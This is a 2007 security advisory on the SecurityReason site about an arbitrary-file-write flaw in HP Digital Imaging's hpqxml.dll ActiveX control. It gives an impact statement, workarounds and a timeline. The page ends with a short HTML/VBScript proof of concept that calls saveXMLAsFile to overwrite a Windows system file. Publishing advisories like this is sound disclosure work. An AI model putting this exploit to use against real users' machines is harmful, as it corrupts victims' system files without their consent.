|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 2846 CVE : CVE-2007-3487 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : Yes Exploit Given : Yes Credit : Brian Mariani & Goodfellas SRT Published : 02.07.2007
Advisory Text : :. GOODFELLAS Security Research TEAM .: :. http://goodfellas.shellcode.com.ar .: hpqxml.dll 2.0.0.133 from HP Digital Imaging Arbitary Data Write =================================================== Internal ID: VULWAR200706275. Introduction hpqxml.dll is a library included in the HP Photo Digital Imaging software package from the HP Company. http://www.hp.com. Link: http://www.hp.com/united-states/consumer/digital_photography/home_f.html Tested In - Windows XP SP2 english/french with IE 6.0 / 7.0. - Windows vista Professional English/French SP1 with IE 7.0 Summary The saveXMLAsFile method doesn't check if it is being called from the application or from a malicious user. Impact The vulnerability is due to an error in the saveXMLAsFile method that manipulate local files insecurely, which could allow malicious users to write arbitrary data to any file on a vulnerable system. Besides, the method does not check the file headers before writing. Workaround - Activate the Kill bit zero in clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3. - Unregister hpqxml.dll using regsvr32. Timeline June 27, 2007 -- Bug discovery. June 27, 2007 -- Bug published. Credits * Brian Mariani <bmariani (at) shellcode.com (dot) ar [email concealed] * GoodFellas Security Research Team <goodfellas.shellcode.com.ar> Technical Detail saveXMLAsFile method receives a filename as an argument, with this format "c:pathfile". Proof of Concept <html> <head> <title>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write</title> </head> <body> <h3>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write</h3><br> <object classid='clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3' id='target' /></object> <input language=VBScript onclick=HP() type=button value="Proof of Concept"> <script language = 'vbscript'> Sub HP() filename = "C:NTDETECT_.COM" target.saveXMLAsFile filename End Sub </script> </body> </html> -- Goodfellas SRT <goodfellas (at) shellcode.com (dot) ar [email concealed]> Goodfellas Security Research Team  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |